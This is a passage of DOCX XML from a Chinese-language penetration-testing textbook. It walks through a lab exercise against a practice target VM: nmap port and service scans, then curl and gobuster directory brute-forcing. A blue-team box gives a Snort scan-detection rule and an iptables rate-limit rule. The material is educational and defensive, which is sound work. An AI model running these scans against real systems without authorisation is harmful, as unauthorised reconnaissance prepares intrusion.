          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">OPEN_PORTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -oA nmap_svc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 4. 针对 HTTP 服务的进一步枚举（见第 5 章）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> http-enum,http-headers,http-methods </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ②</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描应返回靶机在线。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-p-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">全端口扫描应发现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">22/tcp（SSH）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">80/tcp（HTTP）开放。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV -sC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段会输出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OpenSSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Apache/nginx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本，以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器的标题（Title）、可能存在的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">robots.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等信息。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- NSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本可能直接发现一些有趣的目录（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/backup/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见报错与排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">未发现靶机：检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox/VMware </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络适配器模式是否设置为“Host-Only”，确认靶机已启动。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如果端口扫描极慢：在实验室隔离网络中，可适当提高</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--min-rate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">5000），但切勿在生产网络中使用高速扫描。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">【防御对照框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤一】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IDS/IPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">规则（Snort/Suricata）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：检测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描行为、同一源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在短时间内对大量端口的连接尝试（见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 19.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节）。规则示例思路：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alert tcp any any -&gt; $HOME_NET any (msg:"Nmap SYN Scan Detected"; flags: S; threshold: type both, track by_src, count 20, seconds 5; sid:1000001;)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">②。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM/日志关联</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：分析防火墙日志中的连接拒绝记录（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> iptables </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志）、主机上的系统日志（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/syslog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），当单一源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个以上不同端口时触发关联告警（见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 19.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测映射，映射到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TA0043 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">主机加固</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> iptables/nftables </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">限制单</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的连接速率（见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 20.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节）。示例：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables -A INPUT -p tcp --syn -m recent --name portscan --rcheck --seconds 30 --hitcount 10 -j DROP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">②。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络分段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器放置在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DMZ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网段，通过防火墙</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">严格限制从互联网可访问的端口（仅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">80/443），减小攻击面（见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 20.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="389"/>
    <w:bookmarkStart w:id="390" w:name="步骤二web-信息收集与目录爆破"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤二：Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息收集与目录爆破</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理回指</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息收集方法论见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（目录枚举/robots.txt）和第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用指纹识别）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">动机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在获得开放端口后，需要进一步了解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用的结构——有哪些隐藏目录、管理接口、备份文件？这些往往是漏洞的入口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">实操命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 1. 使用 curl 查看 Web 首页和 HTTP 响应头</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/ ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 2. 使用 gobuster 进行目录爆破</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> dir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/share/wordlists/dirb/common.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> gobuster.txt ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 3. 检查 robots.txt 和 sitemap.xml（如果有）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/robots.txt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/sitemap.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- HTTP </w:t>
      </w:r>
